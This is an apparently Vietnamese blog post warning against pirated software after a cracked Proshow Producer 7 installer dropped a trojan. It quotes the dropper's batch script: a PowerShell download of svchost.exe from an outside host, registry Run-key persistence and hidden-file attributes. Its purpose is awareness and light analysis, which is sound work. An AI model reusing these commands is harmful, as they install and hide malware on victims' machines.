[Tự Cảm] Phần mềm Lậu – một ly cafe

0
1140
Tôi vốn là người không thích viết mấy Notes kiểu này vì đây là kiểu mà ai cũng “Biết rồi khổ lắm nói mãi, tiền ăn còn không có thì đào đâu ra tiền mua bản quyền”. Trong Notes này tôi cũng không đi sâu vào phân tích mã độc hay gì ghê gớm, tôi chỉ viết ở khía cạnh 1 IT bình thường nên mấy thánh “rờ em” đừng ném đá tôi.
Số là thằng bạn tôi có tải 1 phần mềm làm video trên mạng về. Phần mềm này là Proshow Producer 7.

Link tải ở đây:

Cái này thì chắc ai cũng biết, làm 1 video bằng thằng này thì rất nhanh, đơn giản, dễ xài và tất nhiên có tinh phí. Lic Full  trên trang chủ có giá là 249,95$ (tầm đâu khoảng 5tr5 vnd), mà dù có 500k thì chưa chắc đã có người mua khi còn xài win lậu thì dại gì bỏ tiền mua, có crack thì cứ xài. Ừ thì có crack xài chùa ngu gì không xài (trước khi tán gái tôi cũng xài chùa thằng này làm video tặng gái mà).
Nếu chỉ như vậy thì mọi chuyện không có gì đáng nói, nhưng khi thằng bạn click vào file setup và 1 cửa sổ cmd chạy lên với dòng chữ.
[Tự Cảm] Phần mềm Lậu - một ly cafe
[Tự Cảm] Phần mềm Lậu – một ly cafe
Chà phần mềm làm video mà lại thêm cái svchost.exe làm gì, lại tại từ 1 domain không phải domain của hãng. Tôi nói thằng bạn reset lại máy và kiểm tra lại phần Start-up thì
[Tự Cảm] Phần mềm Lậu - một ly cafe
[Tự Cảm] Phần mềm Lậu – một ly cafe
Lúc này xuất hiện thêm 1 file sppobjs.bat khởi động cùng trong khi trước khi cài phần mềm kia lên thì không thấy xuất hiện.
Tôi thử vào đường dẫn kia và lấy file .bat kia ra xem nội dung là gì.
[Tự Cảm] Phần mềm Lậu - một ly cafe
[Tự Cảm] Phần mềm Lậu – một ly cafe

vietlq – Cái tên này quen vãi luôn.

powershell -Command "(New-Object Net.WebClient).DownloadFile('http://youtube-vietlq.rhcloud.com/view/svchost.exe','%APPDATA%/svchost.exe)";

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "sppobjs" /t REG_SZ /F /D %temp%\sppobjs.batREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "svchost" /t REG_SZ /F /D %APPDATA%\svchost.exeattrib +h +s %temp%\sppobjs.batattrib +h +s %APPDATA%\svchost.exe
Đến đây thì nghi vấn tải phần mềm tặng kèm em bé rồi. Tôi lần theo đường dẫn chứa file svchost.exe và thử quét trên virustotal thì nhận được kết quả
[Tự Cảm] Phần mềm Lậu - một ly cafe
[Tự Cảm] Phần mềm Lậu – một ly cafe
Tôi dùng ProcessExplore xem thử thằng này có connect về đâu và chạy trên Port nào. Tôi thử ping đến IP trojan trỏ về nhưng có vẻ như máy chủ đã sụp hoặc die từ lâu. Đến đây thì các bạn tự hiểu ha. Bài này không có gì gọi là phân tích cao siêu.
Điều đáng nói là:
  1. Phần mềm được share rộng rãi và được share mạnh tay trên các forum lớn (SVIT, vforum, vn-zoom, v.v..). Cái này thì tự hiểu vì sao VN luôn đứng top các quốc gia nhiễm mã độc nha.
  2. Măc dù biết là có virus nhưng vẫn tải. Mặc dù đã được cảnh báo là có virus.
  3. Đọc comment trên topic share phần mềm thì mình thấy 1 sai lầm chết người “Nhiều bạn mặc định AV nhận diện virus là do cái crack chứ không phải do cái phần mềm, trong khi ở đây bạn nhấn chạy file setup là nó khuyến mãi thêm cho bạn em bé rồi”.
  4. Ở đây Trojan chưa được Bypass, giả sử đã được bypass và script .bat kia được mã hóa thì sao nhỉ. Lúc đó thì có chúa mới biết.
Chỉ là phần mềm làm video, tất nhiên còn nhiều (IDM, crack win, office, v.v…). Nếu bạn nào đang xài bản này thì hãy coi lại máy của mềnh nhá. Kẻo 1 ngày bạn lại thấy ảnh mình quay tay được lên trang nhất Page VoZ .
P/s:
  • Đã đến lúc bạn tập thói quen xài phần mềm bản quyền được rồi đấy.
  • Nếu có tải phần mềm thì hãy tải ngay từ trang chủ, tải từ các nguồn khác thì có chúa mới biết nó kèm thêm cái gì trong đó.
  • Các bạn có thể bỏ vài triệu nạp tiền game, vài triệu đi nhậu, ăn chơi hoặc chịch gái thì đừng có viện lý do “Mọe, sinh viên nghèo rớt mồng tơi, win còn xài lậu thì ở đó xài bản quyền
(Thầy Tu – VHB)

Bình luận

comments